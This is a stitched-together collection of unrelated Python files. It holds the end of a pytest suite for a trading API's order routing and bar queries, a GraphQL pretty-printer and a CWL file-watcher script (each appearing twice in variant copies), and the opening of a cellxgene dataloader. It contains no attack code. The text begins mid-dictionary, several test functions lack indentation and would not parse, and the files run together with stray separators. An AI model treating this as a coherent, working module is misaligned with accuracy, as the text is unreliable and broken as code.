        "BOOKING_TYPE": 3,
        "STRAT_TIME_TAGS": "168;126",
        "STRAT_PARAMETERS": {
            "99970": "2",
            "99867": "N",
            "847": "BEST",
            "90057": "BEST",
            "91000": "4.1.95"
        },
        "ORDER_FLAGS_3": 0,
        "ORDER_CLONE_FLAG": 1,
        "STRAT_TARGET": "ATDL",
        "STRATEGY_NAME": "BEST",
        "STRAT_REDUNDANT_DATA": {
            "UseStartTime": "false",
            "UseEndTime": "false",
            "cConditionalType": "{NULL}"
        },
        "STRAT_TIME_ZONE": "America/New_York",
        "STRAT_TYPE": "COWEN_ATM_US_EQT",
        "STRAT_STRING_40": "BEST",
        "UTC_OFFSET": "-240"
    }
    route = 'TEST-ATM-ALGO'
    p = {route: algo_order_parameters}
    ret = api.set_order_route(p)
    assert ret
    assert api.get_order_route() == p
    oid = _market_order(api, 'INTC', 100)
    assert api.query_order(oid)['status'] == 'Filled'
    # Restore the original route for subsequent tests.
    assert api.set_order_route(oldroute)
def test_trade_submission_error_bad_symbol(api):
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, 'BADSYMBOL', 100)
assert o
assert o['status'] == 'Error'
#print('order: %s' % repr(o))
def test_trade_submission_error_bad_quantity(api):
    """A zero-quantity market order must end in status 'Error'.

    Some backends reject it immediately; otherwise wait for the order to
    error out asynchronously before checking.
    """
    account = api.account
    route = 'DEMOEUR'
    o = api.market_order(account, route, 'AAPL', 0)
    assert o
    if o['status'] != 'Error':
        oid = o['permid']
        _wait_for_fill(api, oid, True)
        o = api.query_order(oid)
    assert o['status'] == 'Error'
    #print('order: %s' % repr(o))
#TODO: test other order types
# def json_limit_order(self, args, d):
# """limit_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stop_order(self, args, d):
# """stop_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stoplimit_order(self, args, d):
# """stoplimit_order('symbol', stop_price, limit_price, quantity) => {'field':, data, ...}
@pytest.mark.bars
def test_bars(api):
    """Query historical 1-minute bars for SPY and validate each row's format."""
    assert api.add_symbol('SPY')
    sbar = '2017-08-29 09:30:00'
    ebar = '2017-08-29 09:40:00'
    bars = api.query_bars('SPY', 1, sbar, ebar)
    if _verify_barchart_enabled(api, 'BARCHART'):
        assert bars
        assert type(bars) == list
        for bar in bars:
            assert type(bar) == list
            # Each bar row: date, time, open, high, low, close, volume.
            b_date, b_time, b_open, b_high, b_low, b_close, b_volume = bar
            assert type(b_date) == str
            assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', b_date)
            assert type(b_time) == str
            assert re.match('^\\d\\d:\\d\\d:\\d\\d$', b_time)
            assert type(b_open) == float
            assert type(b_high) == float
            assert type(b_low) == float
            assert type(b_close) == float
            assert type(b_volume) == int
            print('%s %s %.2f %.2f %.2f %.2f %d' % (b_date, b_time, b_open, b_high, b_low, b_close, b_volume))
    else:
        # Feature disabled server-side: expect a falsy result.
        assert not bars
    print('bars=%s' % repr(bars))
def test_cancel_order(api):
ret = api.cancel_order('000')
assert ret
def test_global_cancel(api):
ret = api.global_cancel()
assert ret
@pytest.mark.skip
def json_gateway_logon(api):
    """Gateway logon helper (skipped; not collected since it isn't named test_*)."""
    result = api.gateway_logon('user', 'passwd')
    assert result
@pytest.mark.skip
def test_gateway_logoff(api):
    """Gateway logoff returns a truthy response (test currently skipped)."""
    result = api.gateway_logoff()
    assert result
@pytest.mark.skip
def test_set_primary_exchange(api):
    """Set MSFT's primary exchange (name differs per backend), then re-add and query it."""
    # NOTE(review): 'exchange' is unbound if TEST_MODE is neither 'RTX' nor
    # 'TWS' — acceptable while the test is skipped, but worth confirming.
    if TEST_MODE == 'RTX':
        exchange = 'NAS'
    elif TEST_MODE == 'TWS':
        exchange = 'NASDAQ'
    assert api.set_primary_exchange('MSFT', exchange)
    assert api.add_symbol('MSFT')
    assert api.query_symbol('MSFT')
def test_help(api):
help = api.help()
assert help
|
import datetime
import json
from json import JSONEncoder
from typing import Any, Dict, Optional
from pygments import highlight, lexers
from pygments.formatters import Terminal256Formatter
from .graphql_lexer import GraphQLLexer
class StrawberryJSONEncoder(JSONEncoder):
    """JSON encoder that never fails on exotic objects.

    Where the base class would raise TypeError for a non-serializable value,
    this encoder falls back to the object's repr().
    """

    def default(self, o: Any) -> Any:
        return repr(o)
def pretty_print_graphql_operation(
    operation_name: Optional[str], query: str, variables: Optional[Dict["str", Any]]
):
    """Pretty print a GraphQL operation using pygments.

    Won't print introspection operation to prevent noise in the output.

    Args:
        operation_name: operation name, or None for anonymous operations.
        query: the GraphQL document text to highlight.
        variables: optional operation variables, dumped as indented JSON.
    """
    # Introspection queries are tooling noise; skip them entirely.
    if operation_name == "IntrospectionQuery":
        return

    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")

    # Single quotes for the inner literal: reusing double quotes inside a
    # double-quoted f-string is a SyntaxError before Python 3.12 (PEP 701).
    print(f"[{now}]: {operation_name or 'No operation name'}")
    print(highlight(query, GraphQLLexer(), Terminal256Formatter()))

    if variables:
        # StrawberryJSONEncoder falls back to repr() for non-serializable values.
        variables_json = json.dumps(variables, indent=4, cls=StrawberryJSONEncoder)

        print(highlight(variables_json, lexers.JsonLexer(), Terminal256Formatter()))
| import datetime
import json
from json import JSONEncoder
from typing import Any, Dict, Optional
from pygments import highlight, lexers
from pygments.formatters import Terminal256Formatter
from .graphql_lexer import GraphQLLexer
class StrawberryJSONEncoder(JSONEncoder):
    """JSON encoder that falls back to repr() instead of raising TypeError
    for values the standard encoder cannot serialize."""

    def default(self, o: Any) -> Any:
        return repr(o)
def pretty_print_graphql_operation(
    operation_name: Optional[str], query: str, variables: Optional[Dict["str", Any]]
):
    """Pretty print a GraphQL operation using pygments.

    Won't print introspection operation to prevent noise in the output.

    Args:
        operation_name: operation name, or None for anonymous operations.
        query: the GraphQL document text to highlight.
        variables: optional operation variables, dumped as indented JSON.
    """
    # Introspection queries are tooling noise; skip them entirely.
    if operation_name == "IntrospectionQuery":
        return

    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")

    print(f"[{now}]: {operation_name or 'No operation name'}")
    print(highlight(query, GraphQLLexer(), Terminal256Formatter()))

    if variables:
        # StrawberryJSONEncoder falls back to repr() for non-serializable values.
        variables_json = json.dumps(variables, indent=4, cls=StrawberryJSONEncoder)

        print(highlight(variables_json, lexers.JsonLexer(), Terminal256Formatter()))
|
import glob
import os
from pathlib import Path
import subprocess as sub
import sys
import time
from typing import Any, Dict, List
from unittest.mock import patch
import graphviz
import networkx as nx
import json
from jsonschema import Draft202012Validator
"""from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler"""
from .wic_types import GraphReps, Tools, YamlTree, Json, GraphData
from .main import get_tools_cwl, get_yml_paths
from .schemas import wic_schema
from . import ast, cli, compiler, inference, utils
def absolute_paths(json: Json, cachedir_path: Path) -> Json:
    """Recursively searches for paths in json and makes them absolute by prepending cachedir_path.

    Args:
        json (Json): The contents of the YAML cwl_watcher config: tag.
        cachedir_path (Path): The --cachedir directory of the main workflow.

    Returns:
        Json: The contents of the YAML cwl_watcher config: tag, with all paths prepended with cachedir_path.
    """
    # NOTE(review): the parameter name 'json' shadows the stdlib json module
    # inside this function; harmless here since the module isn't used within.
    new_json: Json = {}
    for key, val in json.items():
        if isinstance(val, Dict):
            # Recurse into nested mappings.
            new_val = absolute_paths(val, cachedir_path)
        else:
            new_val = val
        # TODO: Improve this heuristic
        if 'input' in key and 'path' in key:
            new_val = str(cachedir_path / val)  # type: ignore
            changed_files = file_watcher_glob(cachedir_path, val, {})
            # We require unique filenames, so there should only be one file.
            # TODO: check
            for file in changed_files:
                new_val = str(Path(file).absolute())  # type: ignore
        new_json[key] = new_val
    return new_json
def rerun_cwltool(directory_realtime: Path, cachedir_path: Path, cwl_tool: str,
                  args_vals: Json, tools_cwl: Tools, yml_paths: Dict[str, Path],
                  validator: Draft202012Validator) -> None:
    """This will speculatively execute cwltool for real-time analysis purposes.\n
    It will NOT check for return code 0. See docs/userguide.md

    Args:
        directory_realtime (Path): The working directory of the main workflow. Currently unused to avoid this workflow from overwriting files from the main workflow (which by design will likely be running concurrently with this code).
        cachedir_path (Path): The --cachedir directory of the main workflow.
        cwl_tool (str): The CWL CommandLineTool or YAML filename (without extension).
        args_vals (Json): The contents of the YAML cwl_watcher config: tag.
        tools_cwl (Tools): The CWL CommandLineTool definitions found using get_tools_cwl()
        yml_paths (Dict[str, Path]): The yml workflow definitions found using get_yml_paths()
        validator (Draft202012Validator): Used to validate the \*.yml files against the autogenerated schema.
    """
    try:
        # Make paths in arguments absolute w.r.t the realtime directory. See below.
        args_vals_new = absolute_paths(args_vals, cachedir_path)

        # Construct a single-step workflow and add its arguments
        #import yaml
        if Path(cwl_tool).suffix == '.yml':
            # A .yml sub-workflow: wrap it and re-parse the AST from disk.
            yaml_path = cwl_tool
            root_yaml_tree = {'wic': {'steps': {f'(1, {cwl_tool})': {'wic': {'steps': args_vals_new}}}}, 'steps': [{cwl_tool: None}]}
            #print('root_yaml_tree')
            #print(yaml.dump(root_yaml_tree))
            yaml_tree_raw = ast.read_AST_from_disk(YamlTree(yaml_path, root_yaml_tree), yml_paths, tools_cwl, validator)
            yaml_tree = ast.merge_yml_trees(yaml_tree_raw, {}, tools_cwl)
            yml = yaml_tree.yml
        else:
            # A plain CommandLineTool: build a single-step wrapper workflow.
            yml = {'steps': [{cwl_tool: args_vals_new}]}
        #print('yml')
        #print(yml)
        #print(yaml.dump(yml))

        # Measure compile time
        time_initial = time.time()

        # Setup dummy args
        testargs = ['wic', '--yaml', '', '--cwl_output_intermediate_files', 'True']  # ignore --yaml
        # For now, we need to enable --cwl_output_intermediate_files. See comment in compiler.py
        with patch.object(sys, 'argv', testargs):
            args = cli.parser.parse_args()

        yaml_path = f'{cwl_tool}_only.yml'
        yaml_tree = YamlTree(yaml_path, yml)
        subgraph = GraphReps(graphviz.Digraph(name=yaml_path), nx.DiGraph(), GraphData(yaml_path))
        compiler_info = compiler.compile_workflow(yaml_tree, args, [], [subgraph], {}, {}, tools_cwl, True, relative_run_path=False)
        rose_tree = compiler_info.rose
        working_dir = Path('.')  # Use a new working directory.
        # Can also use `directory_realtime` at the risk of overwriting other files.
        utils.write_to_disk(rose_tree, working_dir, relative_run_path=False)
        time_final = time.time()
        print(f'compile time for {cwl_tool}: {round(time_final - time_initial, 4)} seconds')

        # NOTE: Since we are running cwltool 'within' cwltool, the inner
        # cwltool command will get run from working_dir, but then cwl_tool
        # will run within some other hashed directory in .../cachedir/
        # The solution is to modify the input paths above to be absolute.
        # The easiest way to do this for now is recompiling. This adds a few
        # seconds, but most of the time will be CWL validation and runtime.
        # Alternatively, we could try to compile once in main() and then
        # make the paths absolute in f'{cwl_tool}_only_inputs.yml' here.
        cmd: List[str] = ['cwltool', '--cachedir', str(cachedir_path), f'{cwl_tool}_only.cwl', f'{cwl_tool}_only_inputs.yml']
        #proc = sub.run(self.cmd, cwd=working_dir)
        #cmd = self.cmd
        print('Running', cmd)
        proc = sub.run(cmd, cwd=working_dir)
        print('inner cwltool completed')
        # Don't check the return code because the file may not exist yet, or
        # because speculative execution may fail for any number of reasons.
        # proc.check_returncode()
    except FileNotFoundError as e:
        # The file may not exist yet.
        print(e)
# NOTE: You should be very careful when using file watchers! Most libraries
# (watchdog, watchfiles, etc) will use operating system / platform-specific
# APIs to check for changes (for performance reasons). However, this can cause
# problems in some cases, specifically for network drives.
# See https://stackoverflow.com/questions/45441623/using-watchdog-of-python-to-monitoring-afp-shared-folder-from-linux
# I'm 99% sure the same problem happens with Docker containers. Either way, the
# solution is to use polling. However, for unknown reasons, simply replacing
# Observer with PollingObserver doesn't seem to work! So we are forced to write
# our own basic file watcher using glob.
"""class SubprocessHandler(PatternMatchingEventHandler):
def __init__(self, cmd: List[str], cachedir_path: str, cwl_tool: str, args_vals: Json, tools_cwl: Tools, **kwargs: Any) -> None:
self.cmd = cmd
self.lock = False
self.cachedir_path = cachedir_path
self.cwl_tool = cwl_tool
self.args_vals = args_vals
self.tools_cwl = tools_cwl
super().__init__(**kwargs)
def on_any_event(self, event: FileSystemEvent) -> None:
# Use a lock to prevent us from DOS'ing ourselves
global lock
if event.event_type == 'modified' and not lock:
directory = Path(event._src_path).parent
print('directory', directory)
#self.lock = True
print(event)
rerun_cwltool(directory, self.cachedir_path, self.cwl_tool, self.args_vals, self.tools_cwl)
#self.lock = False"""
def file_watcher_glob(cachedir_path: Path, pattern: str, prev_files: Dict[str, float]) -> Dict[str, float]:
    """Determines whether files (specified by the given glob pattern) have been either recently created or modified.

    Note that this is a workaround due to an issue with using standard file-watching libraries.

    Args:
        cachedir_path (Path): The --cachedir directory of the main workflow.
        pattern (str): The glob pattern which specifies the files to be watched.
        prev_files (Dict[str, float]): This should be the return value from the previous function call.

    Returns:
        Dict[str, float]: A dictionary containing the filepaths and last modification times.
    """
    changed_files = {}
    file_pattern = str(cachedir_path / f'**/{pattern}')
    file_paths = glob.glob(file_pattern, recursive=True)
    for file in file_paths:
        # 'mtime' rather than 'time': the old local shadowed the time module.
        mtime = os.path.getmtime(file)
        if file not in prev_files:
            # created since the previous scan
            changed_files[file] = mtime
        elif mtime > prev_files[file]:
            # modified since the previous scan
            changed_files[file] = mtime
    return changed_files
def main() -> None:
    """Entry point: poll the cachedir for changed files and re-run cwltool on each change.

    Expects sys.argv flag/value pairs: --cachedir_path, --file_pattern,
    --cwl_tool, --max_times, --config (values read at indices 2, 4, 6, 8, 10).
    """
    print('cwl_watcher sys.argv', sys.argv)
    # TODO: check that 1,3,5, are --cachedir_path, --file_pattern, --cwl_tool
    # or switch to argparse
    cachedir_path = Path(sys.argv[2])
    file_pattern = sys.argv[4].strip()
    cwl_tool = sys.argv[6]
    max_times = int(sys.argv[8])
    # Create an empty 'logfile' so that cwl_watcher.cwl succeeds.
    # TODO: Maybe capture cwl_tool stdout/stderr and redirect to this logfile.
    logfile = Path(f'{cwl_tool}_only.log')
    logfile.touch()
    # Parse config into CWL input args
    config = sys.argv[10]
    args_vals = json.loads(config)
    # This really needs to be args.cwl_dir, where args comes from the original
    # command line, i.e. we can't just use dummy args.
    cwl_dir = cachedir_path.parent
    tools_cwl = get_tools_cwl(cwl_dir)
    yml_paths = get_yml_paths(cwl_dir)  # TODO: Use cwl_dir for now, but should be yml_dir
    # Perform initialization (This is not ideal)
    compiler.inference_rules = dict(utils.read_lines_pairs(cachedir_path.parent / 'inference_rules.txt'))
    inference.renaming_conventions = utils.read_lines_pairs(cachedir_path.parent / 'renaming_conventions.txt')
    # Generate schemas for validation
    validator = wic_schema.get_validator(tools_cwl, list(yml_paths))
    cachedir_hash_path = Path('.').absolute()
    print('cachedir_hash_path', cachedir_hash_path)
    """cmd: List[str] = ['cwltool', '--cachedir', cachedir_path, f'{cachedir_hash_path}/{cwl_tool}_only.cwl', f'{cachedir_hash_path}/{cwl_tool}_only_inputs.yml']
    event_handler = SubprocessHandler(cmd, cachedir_path, cwl_tool, args_vals, tools_cwl, patterns=[file_pattern])
    observer = PollingObserver() # This does not work!
    observer.schedule(event_handler, cachedir_path, recursive=True)
    observer.start()"""
    # Specify a maximum number of iterations to guarantee termination.
    # Total runtime will be (sleep time + compile time + run time) * max_iters
    # For now, there is no way to estimate max_iters such that polling will end
    # around the same time as the original workflow step.
    # TODO: Generate a file when the original workflow step finishes, and look
    # for that file here to terminate. Keep max_iters just in case.
    iteration = 0  # renamed from 'iter' to avoid shadowing the builtin
    prev_files: Dict[str, float] = {}
    try:
        while iteration < max_times:
            # Use our own polling file watcher, see above.
            changed_files = file_watcher_glob(cachedir_path, file_pattern, prev_files)
            for file in changed_files:
                if file_pattern[1:] in file:
                    print(file)
                    rerun_cwltool(Path(file).parent, cachedir_path, cwl_tool, args_vals, tools_cwl, yml_paths, validator)
            prev_files = {**prev_files, **changed_files}
            time.sleep(1.0)  # Wait at least 1 second so we don't just spin.
            iteration += 1
    except KeyboardInterrupt:
        pass
    #observer.stop()
    #observer.join()
    failed = False  # Your analysis goes here
    if failed:
        print(f'{cwl_tool} failed!')
        sys.exit(1)
if __name__ == "__main__":
main() | import glob
import os
from pathlib import Path
import subprocess as sub
import sys
import time
from typing import Any, Dict, List
from unittest.mock import patch
import graphviz
import networkx as nx
import json
from jsonschema import Draft202012Validator
"""from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler"""
from .wic_types import GraphReps, Tools, YamlTree, Json, GraphData
from .main import get_tools_cwl, get_yml_paths
from .schemas import wic_schema
from . import ast, cli, compiler, inference, utils
def absolute_paths(json: Json, cachedir_path: Path) -> Json:
    """Recursively searches for paths in json and makes them absolute by prepending cachedir_path.

    Args:
        json (Json): The contents of the YAML cwl_watcher config: tag.
        cachedir_path (Path): The --cachedir directory of the main workflow.

    Returns:
        Json: The contents of the YAML cwl_watcher config: tag, with all paths prepended with cachedir_path.
    """
    result: Json = {}
    for key, val in json.items():
        # Recurse into nested mappings; leave scalars untouched.
        new_val = absolute_paths(val, cachedir_path) if isinstance(val, Dict) else val
        # TODO: Improve this heuristic
        if 'input' in key and 'path' in key:
            new_val = str(cachedir_path / val)  # type: ignore
            matches = file_watcher_glob(cachedir_path, val, {})
            # We require unique filenames, so there should only be one file.
            # TODO: check
            for matched_file in matches:
                new_val = str(Path(matched_file).absolute())  # type: ignore
        result[key] = new_val
    return result
def rerun_cwltool(directory_realtime: Path, cachedir_path: Path, cwl_tool: str,
                  args_vals: Json, tools_cwl: Tools, yml_paths: Dict[str, Path],
                  validator: Draft202012Validator) -> None:
    """This will speculatively execute cwltool for real-time analysis purposes.\n
    It will NOT check for return code 0. See docs/userguide.md

    Args:
        directory_realtime (Path): The working directory of the main workflow. Currently unused to avoid this workflow from overwriting files from the main workflow (which by design will likely be running concurrently with this code).
        cachedir_path (Path): The --cachedir directory of the main workflow.
        cwl_tool (str): The CWL CommandLineTool or YAML filename (without extension).
        args_vals (Json): The contents of the YAML cwl_watcher config: tag.
        tools_cwl (Tools): The CWL CommandLineTool definitions found using get_tools_cwl()
        yml_paths (Dict[str, Path]): The yml workflow definitions found using get_yml_paths()
        validator (Draft202012Validator): Used to validate the \\*.yml files against the autogenerated schema.
    """
    try:
        # Make paths in arguments absolute w.r.t the realtime directory. See below.
        args_vals_new = absolute_paths(args_vals, cachedir_path)
        # Construct a single-step workflow and add its arguments
        # import yaml
        if Path(cwl_tool).suffix == '.yml':
            # cwl_tool is itself a yml (sub)workflow: wrap it in a root tree so that
            # args_vals_new reach its steps, then resolve/merge the AST from disk.
            yaml_path = cwl_tool
            root_yaml_tree = {'wic': {'steps': {f'(1, {cwl_tool})': {'wic': {'steps': args_vals_new}}}}, 'steps': [{cwl_tool: None}]}
            # print('root_yaml_tree')
            # print(yaml.dump(root_yaml_tree))
            yaml_tree_raw = ast.read_AST_from_disk(YamlTree(yaml_path, root_yaml_tree), yml_paths, tools_cwl, validator)
            yaml_tree = ast.merge_yml_trees(yaml_tree_raw, {}, tools_cwl)
            yml = yaml_tree.yml
        else:
            # cwl_tool is a single CommandLineTool: a one-step workflow suffices.
            yml = {'steps': [{cwl_tool: args_vals_new}]}
        # print('yml')
        # print(yml)
        # print(yaml.dump(yml))
        # Measure compile time
        time_initial = time.time()
        # Setup dummy args
        testargs = ['wic', '--yaml', '', '--cwl_output_intermediate_files', 'True']  # ignore --yaml
        # For now, we need to enable --cwl_output_intermediate_files. See comment in compiler.py
        with patch.object(sys, 'argv', testargs):
            args = cli.parser.parse_args()
        yaml_path = f'{cwl_tool}_only.yml'
        yaml_tree = YamlTree(yaml_path, yml)
        subgraph = GraphReps(graphviz.Digraph(name=yaml_path), nx.DiGraph(), GraphData(yaml_path))
        compiler_info = compiler.compile_workflow(yaml_tree, args, [], [subgraph], {}, {}, tools_cwl, True, relative_run_path=False)
        rose_tree = compiler_info.rose
        working_dir = Path('.')  # Use a new working directory.
        # Can also use `directory_realtime` at the risk of overwriting other files.
        utils.write_to_disk(rose_tree, working_dir, relative_run_path=False)
        time_final = time.time()
        print(f'compile time for {cwl_tool}: {round(time_final - time_initial, 4)} seconds')
        # NOTE: Since we are running cwltool 'within' cwltool, the inner
        # cwltool command will get run from working_dir, but then cwl_tool
        # will run within some other hashed directory in .../cachedir/
        # The solution is to modify the input paths above to be absolute.
        # The easiest way to do this for now is recompiling. This adds a few
        # seconds, but most of the time will be CWL validation and runtime.
        # Alternatively, we could try to compile once in main() and then
        # make the paths absolute in f'{cwl_tool}_only_inputs.yml' here.
        cmd: List[str] = ['cwltool', '--cachedir', str(cachedir_path), f'{cwl_tool}_only.cwl', f'{cwl_tool}_only_inputs.yml']
        # proc = sub.run(self.cmd, cwd=working_dir)
        # cmd = self.cmd
        print('Running', cmd)
        proc = sub.run(cmd, cwd=working_dir)
        print('inner cwltool completed')
        # Don't check the return code because the file may not exist yet, or
        # because speculative execution may fail for any number of reasons.
        # proc.check_returncode()
    except FileNotFoundError as e:
        # The file may not exist yet.
        print(e)
# NOTE: You should be very careful when using file watchers! Most libraries
# (watchdog, watchfiles, etc) will use operating system / platform-specific
# APIs to check for changes (for performance reasons). However, this can cause
# problems in some cases, specifically for network drives.
# See https://stackoverflow.com/questions/45441623/using-watchdog-of-python-to-monitoring-afp-shared-folder-from-linux
# I'm 99% sure the same problem happens with Docker containers. Either way, the
# solution is to use polling. However, for unknown reasons, simply replacing
# Observer with PollingObserver doesn't seem to work! So we are forced to write
# our own basic file watcher using glob.
"""class SubprocessHandler(PatternMatchingEventHandler):
def __init__(self, cmd: List[str], cachedir_path: str, cwl_tool: str, args_vals: Json, tools_cwl: Tools, **kwargs: Any) -> None:
self.cmd = cmd
self.lock = False
self.cachedir_path = cachedir_path
self.cwl_tool = cwl_tool
self.args_vals = args_vals
self.tools_cwl = tools_cwl
super().__init__(**kwargs)
def on_any_event(self, event: FileSystemEvent) -> None:
# Use a lock to prevent us from DOS'ing ourselves
global lock
if event.event_type == 'modified' and not lock:
directory = Path(event._src_path).parent
print('directory', directory)
#self.lock = True
print(event)
rerun_cwltool(directory, self.cachedir_path, self.cwl_tool, self.args_vals, self.tools_cwl)
#self.lock = False"""
def file_watcher_glob(cachedir_path: Path, pattern: str, prev_files: Dict[str, float]) -> Dict[str, float]:
    """Determines whether files (specified by the given glob pattern) have been either recently created or modified.\n
    Note that this is a workaround due to an issue with using standard file-watching libraries.

    Args:
        cachedir_path (Path): The --cachedir directory of the main workflow.
        pattern (str): The glob pattern which specifies the files to be watched.
        prev_files (Dict[str, float]): This should be the return value from the previous function call.

    Returns:
        Dict[str, float]: A dictionary containing the filepaths and last modification times.
    """
    changed_files = {}
    file_pattern = str(cachedir_path / f'**/{pattern}')
    file_paths = glob.glob(file_pattern, recursive=True)
    for file in file_paths:
        # Renamed from `time` so the stdlib time module (used elsewhere in this
        # script) is not shadowed.
        mtime = os.path.getmtime(file)
        if file not in prev_files:
            # created
            changed_files[file] = mtime
        elif mtime > prev_files[file]:
            # modified
            changed_files[file] = mtime
    return changed_files
def main() -> None:
    """Entry point of the cwl_watcher helper.

    Polls --cachedir for files matching a glob pattern and speculatively re-runs
    cwltool on each newly created or modified file, for a bounded number of
    iterations.
    """
    print('cwl_watcher sys.argv', sys.argv)
    # TODO: check that 1,3,5, are --cachedir_path, --file_pattern, --cwl_tool
    # or switch to argparse
    cachedir_path = Path(sys.argv[2])
    file_pattern = sys.argv[4].strip()
    cwl_tool = sys.argv[6]
    max_times = int(sys.argv[8])
    # Create an empty 'logfile' so that cwl_watcher.cwl succeeds.
    # TODO: Maybe capture cwl_tool stdout/stderr and redirect to this logfile.
    logfile = Path(f'{cwl_tool}_only.log')
    logfile.touch()
    # Parse config into CWL input args.
    # (Renamed from `config` to avoid shadowing a commonly imported module name.)
    config_json = sys.argv[10]
    args_vals = json.loads(config_json)
    # This really needs to be args.cwl_dir, where args comes from the original
    # command line, i.e. we can't just use dummy args.
    cwl_dir = cachedir_path.parent
    tools_cwl = get_tools_cwl(cwl_dir)
    yml_paths = get_yml_paths(cwl_dir)  # TODO: Use cwl_dir for now, but should be yml_dir
    # Perform initialization (This is not ideal)
    compiler.inference_rules = dict(utils.read_lines_pairs(cachedir_path.parent / 'inference_rules.txt'))
    inference.renaming_conventions = utils.read_lines_pairs(cachedir_path.parent / 'renaming_conventions.txt')
    # Generate schemas for validation
    validator = wic_schema.get_validator(tools_cwl, list(yml_paths))
    cachedir_hash_path = Path('.').absolute()
    print('cachedir_hash_path', cachedir_hash_path)
    # Retained for reference: the watchdog/PollingObserver alternative that does
    # not work on network drives (see module comment above).
    """cmd: List[str] = ['cwltool', '--cachedir', cachedir_path, f'{cachedir_hash_path}/{cwl_tool}_only.cwl', f'{cachedir_hash_path}/{cwl_tool}_only_inputs.yml']
    event_handler = SubprocessHandler(cmd, cachedir_path, cwl_tool, args_vals, tools_cwl, patterns=[file_pattern])
    observer = PollingObserver()  # This does not work!
    observer.schedule(event_handler, cachedir_path, recursive=True)
    observer.start()"""
    # Specify a maximum number of iterations to guarantee termination.
    # Total runtime will be (sleep time + compile time + run time) * max_iters
    # For now, there is no way to estimate max_iters such that polling will end
    # around the same time as the original workflow step.
    # TODO: Generate a file when the original workflow step finishes, and look
    # for that file here to terminate. Keep max_iters just in case.
    iteration = 0  # renamed from `iter` to avoid shadowing the builtin
    prev_files: Dict[str, float] = {}
    try:
        while iteration < max_times:
            # Use our own polling file watcher, see above.
            changed_files = file_watcher_glob(cachedir_path, file_pattern, prev_files)
            for file in changed_files:
                if file_pattern[1:] in file:
                    print(file)
                    rerun_cwltool(Path(file).parent, cachedir_path, cwl_tool, args_vals, tools_cwl, yml_paths, validator)
            prev_files = {**prev_files, **changed_files}
            time.sleep(1.0)  # Wait at least 1 second so we don't just spin.
            iteration += 1
    except KeyboardInterrupt:
        pass
    # observer.stop()
    # observer.join()
    failed = False  # Your analysis goes here
    if failed:
        print(f'{cwl_tool} failed!')
        sys.exit(1)
# Script entry point. (A stray '|' artifact after the call — a syntax error —
# was removed.)
if __name__ == "__main__":
    main()
import anndata
from IPython.display import display_javascript, display_html
import json
import os
import pathlib
import pickle
import requests
from typing import List, Union
import uuid
from sfaira.data.dataloaders.base import DatasetBase
from sfaira.consts import AdataIdsCellxgene, AdataIdsCellxgene_v2_0_0
from sfaira.consts.directories import CACHE_DIR_DATABASES_CELLXGENE
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import get_collection, get_data
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import CELLXGENE_PRODUCTION_ENDPOINT, DOWNLOAD_DATASET
def cellxgene_fn(dir, dataset_id):
    """Return the path of the local h5ad copy of data set ``dataset_id`` under ``dir``."""
    fn = dataset_id + ".h5ad"
    return os.path.join(dir, fn)
def clean_cellxgene_meta_obs(k, val, adata_ids) -> Union[str, List[str]]:
    """
    Normalise one cell-wise (.obs) meta data column downloaded from cellxgene.

    :param k: Found meta data name.
    :param val: Found meta data entries (one per cell).
    :param adata_ids: Cellxgene ID container (unused here, kept for API symmetry).
    :returns: Cleaned meta data entries.
    """
    if k == "disease":
        # TODO normal state label varies in disease annotation. This can be removed once streamlined.
        return ["healthy" if v.lower() in ("normal", "healthy") else v for v in val]
    if k == "organ":
        # Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
        return [v.split(" ")[0] for v in val]
    if k == "organism":
        # TODO deprecate map once same organism naming is used.
        name_map = {
            "Homo sapiens": "human",
            "Mus musculus": "mouse",
        }
        return [name_map.get(v, v) for v in val]
    return val
def clean_cellxgene_meta_uns(k, val, adata_ids) -> Union[str, List[str]]:
    """
    Normalise one dataset-wise (.uns) meta data entry downloaded from cellxgene.

    :param k: Found meta data name.
    :param val: Found meta data entries; "sex" entries are sequences, the rest are
        {"label": ..., "ontology_term_id": ...} dictionaries.
    :param adata_ids: Cellxgene ID container defining unknown / invalid identifiers.
    :returns: Cleaned meta data entries, with unknown / invalid values dropped.
    """
    cleaned = []
    for entry in val:
        if k == "sex":
            item = entry[0]
        else:
            # Decide if labels are read from name or ontology ID:
            if k == "disease" and entry["label"].lower() in ("normal", "healthy"):
                # TODO normal state label varies in disease annotation. This can be removed once streamlined.
                item = "healthy"
            elif k in ("assay_sc", "disease", "organ") and \
                    entry["ontology_term_id"] != adata_ids.unknown_metadata_identifier:
                item = entry["ontology_term_id"]
            else:
                item = entry["label"]
            # Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
            if k == "organ":
                item = item.split(" ")[0]
            if k == "organism":
                # TODO deprecate map once same organism naming is used.
                item = {"Homo sapiens": "human", "Mus musculus": "mouse"}.get(item, item)
        if item not in (adata_ids.unknown_metadata_identifier, adata_ids.invalid_metadata_identifier):
            cleaned.append(item)
    return cleaned
class Dataset(DatasetBase):
    """
    This is a dataloader for downloaded h5ad from cellxgene.

    In contrast to the base class, each instance is coupled to a particular collection_id to allow query.
    In the base classes, collection_id are only defined on the group level.
    """

    collection_id: str

    def __init__(
            self,
            collection_id: str = "default",
            data_path: Union[str, None] = None,
            meta_path: Union[str, None] = None,
            cache_path: Union[str, None] = None,
            load_func=None,
            dict_load_func_annotation=None,
            yaml_path: Union[str, None] = None,
            sample_fn: Union[str, None] = None,
            sample_fns: Union[List[str], None] = None,
            additional_annotation_key: Union[str, None] = None,
            verbose: int = 0,
            **kwargs
    ):
        super().__init__(
            data_path=data_path,
            meta_path=meta_path,
            cache_path=cache_path,
            load_func=load_func,
            sample_fn=sample_fn,
            sample_fns=sample_fns,
        )
        # General keys are defined in the shared IDs object. Further down, the species specific one is loaded to
        # disambiguate species-dependent differences.
        self._adata_ids_cellxgene = AdataIdsCellxgene()
